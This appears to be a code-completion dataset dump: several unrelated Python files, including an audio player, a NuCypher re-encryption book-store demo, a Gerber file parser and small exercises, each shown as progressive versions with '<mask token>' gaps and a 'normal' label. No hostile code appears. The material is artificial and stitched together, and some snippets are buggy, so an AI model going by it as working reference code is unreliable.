"step-3": "<mask token>\n\n\ndef listFiles(path):\n return glob.glob(path + '*.wav')\n\n\n<mask token>\n\n\ndef getNextFile(files):\n return random.choice(files)\n\n\n<mask token>\nCHUNK = 1024\n\n\ndef getRandomFile(folder='test/'):\n files = listFiles(folder)\n filename = getNextFile(files)\n return filename\n\n\ndef play(filename):\n f = wave.open(filename, 'rb')\n p = pyaudio.PyAudio()\n stream = p.open(format=p.get_format_from_width(f.getsampwidth()),\n channels=f.getnchannels(), rate=f.getframerate(), output=True)\n data = f.readframes(CHUNK)\n while data:\n stream.write(data)\n data = f.readframes(CHUNK)\n stream.stop_stream()\n stream.close()\n p.terminate()\n",
"step-4": "import glob\n\n\ndef listFiles(path):\n return glob.glob(path + '*.wav')\n\n\nimport random\n\n\ndef getNextFile(files):\n return random.choice(files)\n\n\nimport pyaudio\nimport wave\nCHUNK = 1024\n\n\ndef getRandomFile(folder='test/'):\n files = listFiles(folder)\n filename = getNextFile(files)\n return filename\n\n\ndef play(filename):\n f = wave.open(filename, 'rb')\n p = pyaudio.PyAudio()\n stream = p.open(format=p.get_format_from_width(f.getsampwidth()),\n channels=f.getnchannels(), rate=f.getframerate(), output=True)\n data = f.readframes(CHUNK)\n while data:\n stream.write(data)\n data = f.readframes(CHUNK)\n stream.stop_stream()\n stream.close()\n p.terminate()\n",
"step-5": "# list audio files\nimport glob\ndef listFiles(path):\n return glob.glob(path + '*.wav')\n\nimport random\ndef getNextFile(files):\n return random.choice(files)\n\nimport pyaudio\nimport wave\nCHUNK = 1024\n\ndef getRandomFile(folder = 'test/'):\n files = listFiles(folder)\n filename = getNextFile(files)\n return filename\n\ndef play(filename):\n # opem file\n f = wave.open(filename, 'rb')\n p = pyaudio.PyAudio()\n #open stream \n stream = p.open(format = p.get_format_from_width(f.getsampwidth()), \n channels = f.getnchannels(), \n rate = f.getframerate(), \n output = True)\n # read data\n data = f.readframes(CHUNK)\n #play stream \n while data:\n stream.write(data) \n data = f.readframes(CHUNK)\n #stop stream \n stream.stop_stream() \n stream.close() \n #close PyAudio \n p.terminate()\n ",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from eth_account.account import Account
from nucypher.characters.lawful import Alice, Bob, Ursula
from nucypher.network.middleware import RestMiddleware
from nucypher.data_sources import DataSource
from umbral.keys import UmbralPublicKey
import sys
import os
import binascii
import shutil
import maya
import datetime
teacher_rest_port = 3501
m = 2
n = 3
with open("examples-runtime-cruft/node-metadata-{}".format(teacher_rest_port), "r") as f:
f.seek(0)
teacher_bytes = binascii.unhexlify(f.read())
URSULA = Ursula.from_bytes(teacher_bytes, federated_only=True)
print("Will learn from {}".format(URSULA))
SHARED_CRUFTSPACE = "{}/examples-runtime-cruft".format(os.path.dirname(os.path.abspath(__file__)))
CRUFTSPACE = "{}/drm".format(SHARED_CRUFTSPACE)
CERTIFICATE_DIR = "{}/certs".format(CRUFTSPACE)
shutil.rmtree(CRUFTSPACE, ignore_errors=True)
os.mkdir(CRUFTSPACE)
os.mkdir(CERTIFICATE_DIR)
URSULA.save_certificate_to_disk(CERTIFICATE_DIR)
class ETHAccount(object):
def send_eth_to(self, to, amount):
return(to.fallback(self, amount))
class Author(object):
"""
The author of the book
"""
balance = 0
def __init__(self, eth_pk_bytes, character):
self.account = Account.create(eth_pk_bytes)
self.character = character
class Book(object):
def __init__(self, author):
self.author = author
self.content = b"PlainText of the book"
self.label = b"book"
class BookStoreEthContract(object):
"""
The contract receiving the rewards and selling the books
"""
def __init__(self, book, author, price, purchase_event_hook):
self.book = book
self.rewardee = author
self.price = price
self.purchase_event_hook = purchase_event_hook
def fallback(self, sender, amount):
print("Received %s ETH from %s" % (amount, sender.account.address))
if amount == self.price:
sender.balance -= amount
self.rewardee.balance += amount
return(self.purchase_event_hook(sender))
class BookStoreDelivery(object):
def __init__(self, book):
self.book = book
self.author = book.author
def deliver_purchase(self, to):
policy_end_datetime = maya.now() + datetime.timedelta(days=5)
policy = author.character.grant(first_buyer.character, self.book.label, m=m, n=n,
expiration=policy_end_datetime)
author_pubkey = bytes(self.author.character.stamp)
data_source = DataSource(policy_pubkey_enc=policy.public_key)
message_kit, _signature = data_source.encapsulate_single_message(self.book.content)
data_source_public_key = bytes(data_source.stamp)
return (author_pubkey, policy.public_key, data_source_public_key, self.book.label, message_kit)
class Buyer(ETHAccount):
"""
The person who pays for the book and receives content
"""
balance = 100
def __init__(self, eth_pk_bytes, character):
self.account = Account.create(eth_pk_bytes)
self.character = character
author = Author(b"Author's ETH account", Alice(network_middleware=RestMiddleware(),
known_nodes=(URSULA,),
federated_only=True,
known_certificates_dir=CERTIFICATE_DIR,))
author.character.start_learning_loop(now=True)
book = Book(author)
first_buyer = Buyer(b"First Buyer's ETH account", Bob(known_nodes=(URSULA,),
federated_only=True,
known_certificates_dir=CERTIFICATE_DIR))
book_store_delivery = BookStoreDelivery(book)
book_store_contract = BookStoreEthContract(book, author, 10, book_store_delivery.deliver_purchase)
author_public_key, policy_public_key, data_source_public_key, label, kit = first_buyer.send_eth_to(book_store_contract, 10)
first_buyer.character.join_policy(label, # The label - he needs to know what data he's after.
bytes(author.character.stamp), # To verify the signature, he'll need Alice's public key.
# He can also bootstrap himself onto the network more quickly
# by providing a list of known nodes at this time.
node_list=[("localhost", 3601)]
)
datasource_as_understood_by_bob = DataSource.from_public_keys(
policy_public_key=policy_public_key,
datasource_public_key=data_source_public_key,
label=label
)
alice_pubkey_restored_from_ancient_scroll = UmbralPublicKey.from_bytes(author_public_key)
delivered_cleartexts = first_buyer.character.retrieve(message_kit=kit,
data_source=datasource_as_understood_by_bob,
alice_verifying_key=alice_pubkey_restored_from_ancient_scroll)
print(delivered_cleartexts)
|
normal
|
{
"blob_id": "bc843abecfc076c9413498f9ebba0da0857ad3cc",
"index": 4103,
"step-1": "<mask token>\n\n\nclass Author(object):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Book(object):\n\n def __init__(self, author):\n self.author = author\n self.content = b'PlainText of the book'\n self.label = b'book'\n\n\nclass BookStoreEthContract(object):\n \"\"\"\n The contract receiving the rewards and selling the books\n \"\"\"\n\n def __init__(self, book, author, price, purchase_event_hook):\n self.book = book\n self.rewardee = author\n self.price = price\n self.purchase_event_hook = purchase_event_hook\n\n def fallback(self, sender, amount):\n print('Received %s ETH from %s' % (amount, sender.account.address))\n if amount == self.price:\n sender.balance -= amount\n self.rewardee.balance += amount\n return self.purchase_event_hook(sender)\n\n\nclass BookStoreDelivery(object):\n\n def __init__(self, book):\n self.book = book\n self.author = book.author\n\n def deliver_purchase(self, to):\n policy_end_datetime = maya.now() + datetime.timedelta(days=5)\n policy = author.character.grant(first_buyer.character, self.book.\n label, m=m, n=n, expiration=policy_end_datetime)\n author_pubkey = bytes(self.author.character.stamp)\n data_source = DataSource(policy_pubkey_enc=policy.public_key)\n message_kit, _signature = data_source.encapsulate_single_message(self\n .book.content)\n data_source_public_key = bytes(data_source.stamp)\n return (author_pubkey, policy.public_key, data_source_public_key,\n self.book.label, message_kit)\n\n\nclass Buyer(ETHAccount):\n \"\"\"\n The person who pays for the book and receives content\n \"\"\"\n balance = 100\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ETHAccount(object):\n\n def send_eth_to(self, to, amount):\n return to.fallback(self, amount)\n\n\nclass Author(object):\n \"\"\"\n The author of the book\n \"\"\"\n balance = 0\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\nclass Book(object):\n\n def __init__(self, author):\n self.author = author\n self.content = b'PlainText of the book'\n self.label = b'book'\n\n\nclass BookStoreEthContract(object):\n \"\"\"\n The contract receiving the rewards and selling the books\n \"\"\"\n\n def __init__(self, book, author, price, purchase_event_hook):\n self.book = book\n self.rewardee = author\n self.price = price\n self.purchase_event_hook = purchase_event_hook\n\n def fallback(self, sender, amount):\n print('Received %s ETH from %s' % (amount, sender.account.address))\n if amount == self.price:\n sender.balance -= amount\n self.rewardee.balance += amount\n return self.purchase_event_hook(sender)\n\n\nclass BookStoreDelivery(object):\n\n def __init__(self, book):\n self.book = book\n self.author = book.author\n\n def deliver_purchase(self, to):\n policy_end_datetime = maya.now() + datetime.timedelta(days=5)\n policy = author.character.grant(first_buyer.character, self.book.\n label, m=m, n=n, expiration=policy_end_datetime)\n author_pubkey = bytes(self.author.character.stamp)\n data_source = DataSource(policy_pubkey_enc=policy.public_key)\n message_kit, _signature = data_source.encapsulate_single_message(self\n .book.content)\n data_source_public_key = bytes(data_source.stamp)\n return (author_pubkey, policy.public_key, data_source_public_key,\n self.book.label, message_kit)\n\n\nclass Buyer(ETHAccount):\n \"\"\"\n The person who pays for the book and receives content\n \"\"\"\n balance = 100\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\n<mask token>\n",
"step-3": "<mask token>\nwith open('examples-runtime-cruft/node-metadata-{}'.format(\n teacher_rest_port), 'r') as f:\n f.seek(0)\n teacher_bytes = binascii.unhexlify(f.read())\n<mask token>\nprint('Will learn from {}'.format(URSULA))\n<mask token>\nshutil.rmtree(CRUFTSPACE, ignore_errors=True)\nos.mkdir(CRUFTSPACE)\nos.mkdir(CERTIFICATE_DIR)\nURSULA.save_certificate_to_disk(CERTIFICATE_DIR)\n\n\nclass ETHAccount(object):\n\n def send_eth_to(self, to, amount):\n return to.fallback(self, amount)\n\n\nclass Author(object):\n \"\"\"\n The author of the book\n \"\"\"\n balance = 0\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\nclass Book(object):\n\n def __init__(self, author):\n self.author = author\n self.content = b'PlainText of the book'\n self.label = b'book'\n\n\nclass BookStoreEthContract(object):\n \"\"\"\n The contract receiving the rewards and selling the books\n \"\"\"\n\n def __init__(self, book, author, price, purchase_event_hook):\n self.book = book\n self.rewardee = author\n self.price = price\n self.purchase_event_hook = purchase_event_hook\n\n def fallback(self, sender, amount):\n print('Received %s ETH from %s' % (amount, sender.account.address))\n if amount == self.price:\n sender.balance -= amount\n self.rewardee.balance += amount\n return self.purchase_event_hook(sender)\n\n\nclass BookStoreDelivery(object):\n\n def __init__(self, book):\n self.book = book\n self.author = book.author\n\n def deliver_purchase(self, to):\n policy_end_datetime = maya.now() + datetime.timedelta(days=5)\n policy = author.character.grant(first_buyer.character, self.book.\n label, m=m, n=n, expiration=policy_end_datetime)\n author_pubkey = bytes(self.author.character.stamp)\n data_source = DataSource(policy_pubkey_enc=policy.public_key)\n message_kit, _signature = data_source.encapsulate_single_message(self\n .book.content)\n data_source_public_key = bytes(data_source.stamp)\n return 
(author_pubkey, policy.public_key, data_source_public_key,\n self.book.label, message_kit)\n\n\nclass Buyer(ETHAccount):\n \"\"\"\n The person who pays for the book and receives content\n \"\"\"\n balance = 100\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\n<mask token>\nauthor.character.start_learning_loop(now=True)\n<mask token>\nfirst_buyer.character.join_policy(label, bytes(author.character.stamp),\n node_list=[('localhost', 3601)])\n<mask token>\nprint(delivered_cleartexts)\n",
"step-4": "from eth_account.account import Account\nfrom nucypher.characters.lawful import Alice, Bob, Ursula\nfrom nucypher.network.middleware import RestMiddleware\nfrom nucypher.data_sources import DataSource\nfrom umbral.keys import UmbralPublicKey\nimport sys\nimport os\nimport binascii\nimport shutil\nimport maya\nimport datetime\nteacher_rest_port = 3501\nm = 2\nn = 3\nwith open('examples-runtime-cruft/node-metadata-{}'.format(\n teacher_rest_port), 'r') as f:\n f.seek(0)\n teacher_bytes = binascii.unhexlify(f.read())\nURSULA = Ursula.from_bytes(teacher_bytes, federated_only=True)\nprint('Will learn from {}'.format(URSULA))\nSHARED_CRUFTSPACE = '{}/examples-runtime-cruft'.format(os.path.dirname(os.\n path.abspath(__file__)))\nCRUFTSPACE = '{}/drm'.format(SHARED_CRUFTSPACE)\nCERTIFICATE_DIR = '{}/certs'.format(CRUFTSPACE)\nshutil.rmtree(CRUFTSPACE, ignore_errors=True)\nos.mkdir(CRUFTSPACE)\nos.mkdir(CERTIFICATE_DIR)\nURSULA.save_certificate_to_disk(CERTIFICATE_DIR)\n\n\nclass ETHAccount(object):\n\n def send_eth_to(self, to, amount):\n return to.fallback(self, amount)\n\n\nclass Author(object):\n \"\"\"\n The author of the book\n \"\"\"\n balance = 0\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\nclass Book(object):\n\n def __init__(self, author):\n self.author = author\n self.content = b'PlainText of the book'\n self.label = b'book'\n\n\nclass BookStoreEthContract(object):\n \"\"\"\n The contract receiving the rewards and selling the books\n \"\"\"\n\n def __init__(self, book, author, price, purchase_event_hook):\n self.book = book\n self.rewardee = author\n self.price = price\n self.purchase_event_hook = purchase_event_hook\n\n def fallback(self, sender, amount):\n print('Received %s ETH from %s' % (amount, sender.account.address))\n if amount == self.price:\n sender.balance -= amount\n self.rewardee.balance += amount\n return self.purchase_event_hook(sender)\n\n\nclass 
BookStoreDelivery(object):\n\n def __init__(self, book):\n self.book = book\n self.author = book.author\n\n def deliver_purchase(self, to):\n policy_end_datetime = maya.now() + datetime.timedelta(days=5)\n policy = author.character.grant(first_buyer.character, self.book.\n label, m=m, n=n, expiration=policy_end_datetime)\n author_pubkey = bytes(self.author.character.stamp)\n data_source = DataSource(policy_pubkey_enc=policy.public_key)\n message_kit, _signature = data_source.encapsulate_single_message(self\n .book.content)\n data_source_public_key = bytes(data_source.stamp)\n return (author_pubkey, policy.public_key, data_source_public_key,\n self.book.label, message_kit)\n\n\nclass Buyer(ETHAccount):\n \"\"\"\n The person who pays for the book and receives content\n \"\"\"\n balance = 100\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\nauthor = Author(b\"Author's ETH account\", Alice(network_middleware=\n RestMiddleware(), known_nodes=(URSULA,), federated_only=True,\n known_certificates_dir=CERTIFICATE_DIR))\nauthor.character.start_learning_loop(now=True)\nbook = Book(author)\nfirst_buyer = Buyer(b\"First Buyer's ETH account\", Bob(known_nodes=(URSULA,),\n federated_only=True, known_certificates_dir=CERTIFICATE_DIR))\nbook_store_delivery = BookStoreDelivery(book)\nbook_store_contract = BookStoreEthContract(book, author, 10,\n book_store_delivery.deliver_purchase)\n(author_public_key, policy_public_key, data_source_public_key, label, kit\n ) = first_buyer.send_eth_to(book_store_contract, 10)\nfirst_buyer.character.join_policy(label, bytes(author.character.stamp),\n node_list=[('localhost', 3601)])\ndatasource_as_understood_by_bob = DataSource.from_public_keys(policy_public_key\n =policy_public_key, datasource_public_key=data_source_public_key, label\n =label)\nalice_pubkey_restored_from_ancient_scroll = UmbralPublicKey.from_bytes(\n author_public_key)\ndelivered_cleartexts = 
first_buyer.character.retrieve(message_kit=kit,\n data_source=datasource_as_understood_by_bob, alice_verifying_key=\n alice_pubkey_restored_from_ancient_scroll)\nprint(delivered_cleartexts)\n",
"step-5": "from eth_account.account import Account\nfrom nucypher.characters.lawful import Alice, Bob, Ursula\nfrom nucypher.network.middleware import RestMiddleware\nfrom nucypher.data_sources import DataSource\nfrom umbral.keys import UmbralPublicKey\nimport sys\nimport os\nimport binascii\nimport shutil\nimport maya\nimport datetime\n\nteacher_rest_port = 3501\nm = 2\nn = 3\nwith open(\"examples-runtime-cruft/node-metadata-{}\".format(teacher_rest_port), \"r\") as f:\n f.seek(0)\n teacher_bytes = binascii.unhexlify(f.read())\nURSULA = Ursula.from_bytes(teacher_bytes, federated_only=True)\nprint(\"Will learn from {}\".format(URSULA))\nSHARED_CRUFTSPACE = \"{}/examples-runtime-cruft\".format(os.path.dirname(os.path.abspath(__file__)))\nCRUFTSPACE = \"{}/drm\".format(SHARED_CRUFTSPACE)\nCERTIFICATE_DIR = \"{}/certs\".format(CRUFTSPACE)\nshutil.rmtree(CRUFTSPACE, ignore_errors=True)\nos.mkdir(CRUFTSPACE)\nos.mkdir(CERTIFICATE_DIR)\nURSULA.save_certificate_to_disk(CERTIFICATE_DIR)\n\nclass ETHAccount(object):\n def send_eth_to(self, to, amount):\n return(to.fallback(self, amount))\n\nclass Author(object):\n \"\"\"\n The author of the book\n \"\"\"\n balance = 0\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\nclass Book(object):\n def __init__(self, author):\n self.author = author\n self.content = b\"PlainText of the book\"\n self.label = b\"book\"\n\n\nclass BookStoreEthContract(object):\n \"\"\"\n The contract receiving the rewards and selling the books\n \"\"\"\n def __init__(self, book, author, price, purchase_event_hook):\n self.book = book\n self.rewardee = author\n self.price = price\n self.purchase_event_hook = purchase_event_hook\n\n def fallback(self, sender, amount):\n print(\"Received %s ETH from %s\" % (amount, sender.account.address))\n if amount == self.price:\n sender.balance -= amount\n self.rewardee.balance += amount\n return(self.purchase_event_hook(sender))\n\nclass 
BookStoreDelivery(object):\n def __init__(self, book):\n self.book = book\n self.author = book.author\n\n def deliver_purchase(self, to):\n policy_end_datetime = maya.now() + datetime.timedelta(days=5)\n policy = author.character.grant(first_buyer.character, self.book.label, m=m, n=n,\n expiration=policy_end_datetime)\n author_pubkey = bytes(self.author.character.stamp)\n data_source = DataSource(policy_pubkey_enc=policy.public_key)\n message_kit, _signature = data_source.encapsulate_single_message(self.book.content)\n data_source_public_key = bytes(data_source.stamp)\n return (author_pubkey, policy.public_key, data_source_public_key, self.book.label, message_kit)\n\n\n\n\nclass Buyer(ETHAccount):\n \"\"\"\n The person who pays for the book and receives content\n \"\"\"\n balance = 100\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\nauthor = Author(b\"Author's ETH account\", Alice(network_middleware=RestMiddleware(),\n known_nodes=(URSULA,),\n federated_only=True,\n known_certificates_dir=CERTIFICATE_DIR,))\nauthor.character.start_learning_loop(now=True)\n\nbook = Book(author)\nfirst_buyer = Buyer(b\"First Buyer's ETH account\", Bob(known_nodes=(URSULA,),\n federated_only=True,\n known_certificates_dir=CERTIFICATE_DIR))\nbook_store_delivery = BookStoreDelivery(book)\nbook_store_contract = BookStoreEthContract(book, author, 10, book_store_delivery.deliver_purchase)\nauthor_public_key, policy_public_key, data_source_public_key, label, kit = first_buyer.send_eth_to(book_store_contract, 10)\nfirst_buyer.character.join_policy(label, # The label - he needs to know what data he's after.\n bytes(author.character.stamp), # To verify the signature, he'll need Alice's public key.\n # He can also bootstrap himself onto the network more quickly\n # by providing a list of known nodes at this time.\n node_list=[(\"localhost\", 3601)]\n )\ndatasource_as_understood_by_bob = DataSource.from_public_keys(\n 
policy_public_key=policy_public_key,\n datasource_public_key=data_source_public_key,\n label=label\n )\nalice_pubkey_restored_from_ancient_scroll = UmbralPublicKey.from_bytes(author_public_key)\ndelivered_cleartexts = first_buyer.character.retrieve(message_kit=kit,\n data_source=datasource_as_understood_by_bob,\n alice_verifying_key=alice_pubkey_restored_from_ancient_scroll)\nprint(delivered_cleartexts)\n\n\n",
"step-ids": [
14,
19,
20,
22,
23
]
}
|
[
14,
19,
20,
22,
23
] |
"""
Question 39:
Define a function which can generate a list where the values are square of numbers between 1 and
20 (both included). Then the function needs to print the last 5 elements in the list.
"""
#To get a value from console input.
input_num = input("Write number:")
lis1=[]
lis2=[]
def lis(n1,n2):
"""
Generate and print last 5 element in list.
param:n1,n2
"""
i = 0
if n1 and n2 <= 20:
for x in range(n1,n2+1):
lis1.append(x*x)
lis1.reverse()
for y in lis1:
if i <=4:
lis2.append(y)
i +=1
print(lis2)
else:
print("Value out of range")
# Calling function.
lis(input_num[0],input_num[1])
|
normal
|
{
"blob_id": "24c1f5195bad17f995fb97a03218fc9bbe5ce4cd",
"index": 2476,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef lis(n1, n2):\n \"\"\"\n\tGenerate and print last 5 element in list.\n\tparam:n1,n2\n\t\"\"\"\n i = 0\n if n1 and n2 <= 20:\n for x in range(n1, n2 + 1):\n lis1.append(x * x)\n lis1.reverse()\n for y in lis1:\n if i <= 4:\n lis2.append(y)\n i += 1\n print(lis2)\n else:\n print('Value out of range')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef lis(n1, n2):\n \"\"\"\n\tGenerate and print last 5 element in list.\n\tparam:n1,n2\n\t\"\"\"\n i = 0\n if n1 and n2 <= 20:\n for x in range(n1, n2 + 1):\n lis1.append(x * x)\n lis1.reverse()\n for y in lis1:\n if i <= 4:\n lis2.append(y)\n i += 1\n print(lis2)\n else:\n print('Value out of range')\n\n\nlis(input_num[0], input_num[1])\n",
"step-4": "<mask token>\ninput_num = input('Write number:')\nlis1 = []\nlis2 = []\n\n\ndef lis(n1, n2):\n \"\"\"\n\tGenerate and print last 5 element in list.\n\tparam:n1,n2\n\t\"\"\"\n i = 0\n if n1 and n2 <= 20:\n for x in range(n1, n2 + 1):\n lis1.append(x * x)\n lis1.reverse()\n for y in lis1:\n if i <= 4:\n lis2.append(y)\n i += 1\n print(lis2)\n else:\n print('Value out of range')\n\n\nlis(input_num[0], input_num[1])\n",
"step-5": "\"\"\"\nQuestion 39:\nDefine a function which can generate a list where the values are square of numbers between 1 and\n20 (both included). Then the function needs to print the last 5 elements in the list.\n\"\"\"\n\n#To get a value from console input.\ninput_num = input(\"Write number:\")\nlis1=[]\nlis2=[]\n\ndef lis(n1,n2):\n\t\"\"\"\n\tGenerate and print last 5 element in list.\n\tparam:n1,n2\n\t\"\"\"\n\ti = 0\n\tif n1 and n2 <= 20:\n\t\tfor x in range(n1,n2+1):\n\t\t\tlis1.append(x*x)\n\t\tlis1.reverse()\n\t\t\n\t\tfor y in lis1:\n\t\t\tif i <=4:\n\t\t\t\tlis2.append(y)\n\t\t\t\ti +=1\n\t\tprint(lis2)\n\telse:\n\t\tprint(\"Value out of range\")\n\n# Calling function.\nlis(input_num[0],input_num[1])\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
def assert_shapes(shape, other):
assert len(shape) == len(other), "Dimensions are different"
for s, o in zip(shape, other):
if s is not None and o is not None:
assert s == o, "Shapes {} and {} are not equal".format(shape, other)
|
normal
|
{
"blob_id": "337311c3fbb6a8baab7a237d08152f0db9822527",
"index": 2931,
"step-1": "<mask token>\n",
"step-2": "def assert_shapes(shape, other):\n assert len(shape) == len(other), 'Dimensions are different'\n for s, o in zip(shape, other):\n if s is not None and o is not None:\n assert s == o, 'Shapes {} and {} are not equal'.format(shape, other\n )\n",
"step-3": "\ndef assert_shapes(shape, other):\n assert len(shape) == len(other), \"Dimensions are different\"\n for s, o in zip(shape, other):\n if s is not None and o is not None:\n assert s == o, \"Shapes {} and {} are not equal\".format(shape, other)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from .__init__ import *
def surfaceAreaCone(maxRadius=20, maxHeight=50, unit='m'):
a = random.randint(1, maxHeight)
b = random.randint(1, maxRadius)
slopingHeight = math.sqrt(a**2 + b**2)
problem = f"Surface area of cone with height = {a}{unit} and radius = {b}{unit} is"
ans = int(math.pi * b * slopingHeight + math.pi * b * b)
solution = f"{ans} {unit}^2"
return problem, solution
surface_area_cone = Generator(
"Surface Area of cone", 38,
"Surface area of cone with height = a units and radius = b units is",
"c units^2", surfaceAreaCone)
|
normal
|
{
"blob_id": "3e19ede2112a109a776b607e927e2f0a095ba5cc",
"index": 7677,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef surfaceAreaCone(maxRadius=20, maxHeight=50, unit='m'):\n a = random.randint(1, maxHeight)\n b = random.randint(1, maxRadius)\n slopingHeight = math.sqrt(a ** 2 + b ** 2)\n problem = (\n f'Surface area of cone with height = {a}{unit} and radius = {b}{unit} is'\n )\n ans = int(math.pi * b * slopingHeight + math.pi * b * b)\n solution = f'{ans} {unit}^2'\n return problem, solution\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef surfaceAreaCone(maxRadius=20, maxHeight=50, unit='m'):\n a = random.randint(1, maxHeight)\n b = random.randint(1, maxRadius)\n slopingHeight = math.sqrt(a ** 2 + b ** 2)\n problem = (\n f'Surface area of cone with height = {a}{unit} and radius = {b}{unit} is'\n )\n ans = int(math.pi * b * slopingHeight + math.pi * b * b)\n solution = f'{ans} {unit}^2'\n return problem, solution\n\n\nsurface_area_cone = Generator('Surface Area of cone', 38,\n 'Surface area of cone with height = a units and radius = b units is',\n 'c units^2', surfaceAreaCone)\n",
"step-4": "from .__init__ import *\n\n\ndef surfaceAreaCone(maxRadius=20, maxHeight=50, unit='m'):\n a = random.randint(1, maxHeight)\n b = random.randint(1, maxRadius)\n slopingHeight = math.sqrt(a ** 2 + b ** 2)\n problem = (\n f'Surface area of cone with height = {a}{unit} and radius = {b}{unit} is'\n )\n ans = int(math.pi * b * slopingHeight + math.pi * b * b)\n solution = f'{ans} {unit}^2'\n return problem, solution\n\n\nsurface_area_cone = Generator('Surface Area of cone', 38,\n 'Surface area of cone with height = a units and radius = b units is',\n 'c units^2', surfaceAreaCone)\n",
"step-5": "from .__init__ import *\n\n\ndef surfaceAreaCone(maxRadius=20, maxHeight=50, unit='m'):\n a = random.randint(1, maxHeight)\n b = random.randint(1, maxRadius)\n\n slopingHeight = math.sqrt(a**2 + b**2)\n problem = f\"Surface area of cone with height = {a}{unit} and radius = {b}{unit} is\"\n ans = int(math.pi * b * slopingHeight + math.pi * b * b)\n\n solution = f\"{ans} {unit}^2\"\n return problem, solution\n\n\nsurface_area_cone = Generator(\n \"Surface Area of cone\", 38,\n \"Surface area of cone with height = a units and radius = b units is\",\n \"c units^2\", surfaceAreaCone)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from . import views
from django.conf.urls import url,re_path
enquiryUrlPattern = [
url(r'daily-rate-enquiry', views.daily_rate_enquiry_form),
re_path(r'^contact-us-landing-page/$', views.contact_us_landing_page),
]
|
normal
|
{
"blob_id": "ccf1710cff972eaa06e1ccb5ebedc70d946e3215",
"index": 4906,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nenquiryUrlPattern = [url('daily-rate-enquiry', views.\n daily_rate_enquiry_form), re_path('^contact-us-landing-page/$', views.\n contact_us_landing_page)]\n",
"step-3": "from . import views\nfrom django.conf.urls import url, re_path\nenquiryUrlPattern = [url('daily-rate-enquiry', views.\n daily_rate_enquiry_form), re_path('^contact-us-landing-page/$', views.\n contact_us_landing_page)]\n",
"step-4": "from . import views\nfrom django.conf.urls import url,re_path\n\nenquiryUrlPattern = [\n url(r'daily-rate-enquiry', views.daily_rate_enquiry_form),\n re_path(r'^contact-us-landing-page/$', views.contact_us_landing_page),\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class GerberCanvas:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, frame):
self.x_format = ''
self.y_format = ''
self.units = ''
self.quadrant_mode = 0
self.file_commands = ''
self.file_gtp_commands = ''
self.gerber_file_name = ''
self.AD_commands = {}
self.current_aperture = ''
self.x = '0'
self.y = '0'
self.i = '0'
self.j = '0'
self.last_x = ''
self.last_y = ''
self.start_x = ''
self.start_y = ''
self.direction = 0
self.graphics_mode = 0
self.scaled = False
self.bounding_box_size = ()
self._canvas_frame = frame
self.create_canvas()
def create_canvas(self):
self.my_canvas = tk.Canvas(self._canvas_frame, bg='white', bd='1')
self.my_canvas.pack(expand=True, fill='both')
if sys.platform == 'linux':
self.my_canvas.bind('<Button-4>', self.__scale_image_up)
self.my_canvas.bind('<Button-5>', self.__scale_image_down)
else:
self.my_canvas.bind('<MouseWheel>', self.__scale_image)
self.y_scrollbar = tk.Scrollbar(self.my_canvas, command=self.
my_canvas.yview)
self.y_scrollbar.pack(expand=True, fill='y', anchor='e')
self.x_scrollbar = tk.Scrollbar(self.my_canvas, orient=tk.
HORIZONTAL, command=self.my_canvas.xview)
self.x_scrollbar.pack(fill='x', anchor='s')
if sys.platform == 'linux':
self.my_canvas.configure(xscrollcommand=self.x_scrollbar.set,
yscrollcommand=self.y_scrollbar.set)
self.__part_selected = 0
<|reserved_special_token_0|>
def load_gerber_gtp(self, file_path):
self.file_gtp = True
try:
print(file_path)
new_file = 'c' + file_path[1:len(file_path) - 3] + 'GTP'
print('final name =', new_file)
if file_path:
try:
with open(new_file, 'r') as gerber_file:
self.file_gtp_commands = gerber_file.read().splitlines(
)
except TypeError:
messagebox.showerror('Type Error', 'Invalid File Type')
self.__parse_file(self.file_gtp_commands)
except IOError:
messagebox.showerror('File Error', 'File did not open, GTP')
def __parse_file(self, commands):
if DEBUG:
print(self.file_commands)
temp_list = commands
for item in temp_list:
if DEBUG:
print(item)
if '%FSLA' in item:
self.x_format = item[6:8]
self.y_format = item[9:11]
if '%MO' in item:
self.units = item[3:5]
if 'IN' in item:
GerberCanvas.units = 0
if 'MM' in item:
GerberCanvas.units = 1
if 'G01' in item:
self.graphics_mode = 1
if 'G03' in item:
self.direction = 270
if 'G02' in item:
self.direction = 90
if 'G74' in item:
self.quadrant_mode = 0
if 'G75' in item:
self.quadrant_mode = 1
if '%AD' in item:
name = item[3:item.find(',') - 1]
if DEBUG:
print(name)
start = item.find(',')
stop = item.find('*', start)
value = item[start - 1:stop]
if DEBUG:
print(value)
self.AD_commands[name] = value
if item[0:1] == 'D':
item = item[0:item.find('*')]
